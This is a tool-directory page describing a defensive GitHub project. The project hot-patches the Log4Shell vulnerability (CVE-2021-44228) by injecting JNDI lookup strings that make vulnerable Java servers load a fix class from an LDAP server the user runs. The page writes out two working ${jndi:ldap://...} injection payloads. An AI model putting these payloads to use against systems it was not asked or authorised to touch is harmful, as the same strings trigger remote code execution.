Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2021-44228-qingteng-online-patch — Hot-patch CVE-2021-44228 by exploiting the vulnerability itself. | Kitploit
Tools/GitHubGitHub/qingtengyun/cve-2021-44228-qingteng-online-patch
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlIncident Response
GitHubqingtengyun/cve-2021-44228-qingteng-online-patch

cve-2021-44228-qingteng-online-patch

Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
2544 years agoReviewed by Kitploit

cve-2021-44228-qingteng-online-patch

What is this

Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.

How to use

Inject the following code to anywhere likely vulnerable to CVE-2021-44228,

root@kitploit:~
${jndi:ldap://your-own-server/patch}

To prevent MITM attack during the patch process, the following payload is recommended, but with less compatibility for older versions of Java,

root@kitploit:~
${jndi:ldap://your-own-server/any_string_except_patch}

Run your own server

  1. Download the latest releases

  2. Specify system environment variables LOG4J_HOTFIX_HTTP_PATH and LOG4J_HOTFIX_HTTPS_PATH if you want to host Hotfix.class on your own server

Build

Please note Hotfix.java should be compiled with JDK6 for maximum compatibility.

Download Tool